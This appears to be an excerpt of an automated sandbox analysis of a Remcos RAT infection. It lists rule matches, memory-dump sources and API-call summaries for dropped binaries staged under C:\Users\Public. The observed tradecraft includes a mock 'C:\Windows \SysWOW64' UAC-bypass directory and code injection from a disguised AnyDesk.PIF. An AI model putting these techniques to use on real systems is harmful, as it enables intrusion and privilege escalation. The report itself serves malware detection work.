                  Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: saw.batStatic file information: 2921546
                  Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,3_2_00007FF7823E7FF8
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,3_2_00007FF7823FBCF0
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,3_2_00007FF7823E8114
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,3_2_00007FF7823E88C0
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,3_2_00007FF7823D3D94
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E898C NtQueryInformationToken,3_2_00007FF7823E898C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,3_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,3_2_00007FF7823E89E4
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,5_2_00007FF7823E7FF8
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00007FF7823FBCF0
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00007FF7823E8114
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00007FF7823E88C0
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,5_2_00007FF7823D3D94
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E898C NtQueryInformationToken,5_2_00007FF7823E898C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,5_2_00007FF7823E89E4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ABC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,6_2_00007FF6A2ABC964
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,9_2_02ABB118
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB7A2C NtAllocateVirtualMemory,9_2_02AB7A2C
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,9_2_02ABDC8C
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02ABDC04
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB7D78 NtWriteVirtualMemory,9_2_02AB7D78
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,9_2_02ABDD70
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB84C8 NtProtectVirtualMemory,9_2_02AB84C8
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB7A2A NtAllocateVirtualMemory,9_2_02AB7A2A
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02ABDBB0
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB8D6E GetThreadContext,SetThreadContext,NtResumeThread,9_2_02AB8D6E
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB8D70 GetThreadContext,SetThreadContext,NtResumeThread,9_2_02AB8D70
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF7823E7FF8
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF7823E8114
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF7823FBCF0
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF7823E88C0
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF7823D3D94
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E898C NtQueryInformationToken,10_2_00007FF7823E898C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF7823E89E4
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF7823E7FF8
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF7823E8114
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF7823FBCF0
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7823E88C0
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF7823D3D94
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E898C NtQueryInformationToken,11_2_00007FF7823E898C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7823E89E4
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_008664CA NtQueryInformationToken,16_2_008664CA
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00864823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_00864823
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0086643A NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_0086643A
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00877460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_00877460
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0087C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_0087C1FA
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00866500 NtQueryInformationToken,NtQueryInformationToken,16_2_00866500
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0087A135 NtSetInformationFile,16_2_0087A135
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00854E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,16_2_00854E3B
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00864759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,16_2_00864759
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5E357 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,19_2_06F5E357
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,3_2_00007FF7823D5240
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,3_2_00007FF7823E4224
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,19_2_004167EF
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F57526 ExitWindowsEx,LoadLibraryA,GetProcAddress,19_2_06F57526
                  Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior
                  Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64
                  Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E37D83_2_00007FF7823E37D8
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E55543_2_00007FF7823E5554
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E0A6C3_2_00007FF7823E0A6C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E42243_2_00007FF7823E4224
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823DAA543_2_00007FF7823DAA54
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D5B703_2_00007FF7823D5B70
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D3F903_2_00007FF7823D3F90
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D372C3_2_00007FF7823D372C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D9B503_2_00007FF7823D9B50
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D6BE03_2_00007FF7823D6BE0
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D34103_2_00007FF7823D3410
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823FAFBC3_2_00007FF7823FAFBC
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D18843_2_00007FF7823D1884
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E78543_2_00007FF7823E7854
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823FAC4C3_2_00007FF7823FAC4C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D2C483_2_00007FF7823D2C48
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823DB0D83_2_00007FF7823DB0D8
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D85103_2_00007FF7823D8510
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E18D43_2_00007FF7823E18D4
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D7D303_2_00007FF7823D7D30
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7824015383_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D8DF83_2_00007FF7823D8DF8
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823DCE103_2_00007FF7823DCE10
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D81D43_2_00007FF7823D81D4
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823FD9D03_2_00007FF7823FD9D0
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823DE6803_2_00007FF7823DE680
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823FEE883_2_00007FF7823FEE88
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D22203_2_00007FF7823D2220
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D4A303_2_00007FF7823D4A30
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823FAA303_2_00007FF7823FAA30
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D52403_2_00007FF7823D5240
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823DD2503_2_00007FF7823DD250
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D9E503_2_00007FF7823D9E50
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D76503_2_00007FF7823D7650
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D6EE43_2_00007FF7823D6EE4
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823F7F003_2_00007FF7823F7F00
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E37D85_2_00007FF7823E37D8
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E55545_2_00007FF7823E5554
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E0A6C5_2_00007FF7823E0A6C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E42245_2_00007FF7823E4224
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823DAA545_2_00007FF7823DAA54
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D5B705_2_00007FF7823D5B70
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D3F905_2_00007FF7823D3F90
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D372C5_2_00007FF7823D372C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D9B505_2_00007FF7823D9B50
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D6BE05_2_00007FF7823D6BE0
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D34105_2_00007FF7823D3410
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823FAFBC5_2_00007FF7823FAFBC
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D18845_2_00007FF7823D1884
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E78545_2_00007FF7823E7854
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823FAC4C5_2_00007FF7823FAC4C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D2C485_2_00007FF7823D2C48
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823DB0D85_2_00007FF7823DB0D8
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D85105_2_00007FF7823D8510
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E18D45_2_00007FF7823E18D4
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D7D305_2_00007FF7823D7D30
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7824015385_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D8DF85_2_00007FF7823D8DF8
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823DCE105_2_00007FF7823DCE10
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D81D45_2_00007FF7823D81D4
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823FD9D05_2_00007FF7823FD9D0
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823DE6805_2_00007FF7823DE680
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823FEE885_2_00007FF7823FEE88
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D22205_2_00007FF7823D2220
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D4A305_2_00007FF7823D4A30
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823FAA305_2_00007FF7823FAA30
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D52405_2_00007FF7823D5240
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823DD2505_2_00007FF7823DD250
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D9E505_2_00007FF7823D9E50
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D76505_2_00007FF7823D7650
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D6EE45_2_00007FF7823D6EE4
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823F7F005_2_00007FF7823F7F00
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AACCB86_2_00007FF6A2AACCB8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AAF0206_2_00007FF6A2AAF020
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D2F386_2_00007FF6A29D2F38
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AD38006_2_00007FF6A2AD3800
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AABC106_2_00007FF6A2AABC10
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AAC1206_2_00007FF6A2AAC120
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A543D06_2_00007FF6A2A543D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AAE4306_2_00007FF6A2AAE430
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29CA4246_2_00007FF6A29CA424
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AD842F6_2_00007FF6A2AD842F
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A484146_2_00007FF6A2A48414
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E44106_2_00007FF6A29E4410
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A563746_2_00007FF6A2A56374
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA234C6_2_00007FF6A2AA234C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A203986_2_00007FF6A2A20398
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0E3A06_2_00007FF6A2A0E3A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D44E06_2_00007FF6A29D44E0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4E4F06_2_00007FF6A2A4E4F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA84D86_2_00007FF6A2AA84D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A324D46_2_00007FF6A2A324D4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29CC5206_2_00007FF6A29CC520
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3A4506_2_00007FF6A2A3A450
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3C4506_2_00007FF6A2A3C450
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A064A86_2_00007FF6A2A064A8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA04906_2_00007FF6A2AA0490
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A584886_2_00007FF6A2A58488
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A184846_2_00007FF6A2A18484
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4A1E86_2_00007FF6A2A4A1E8
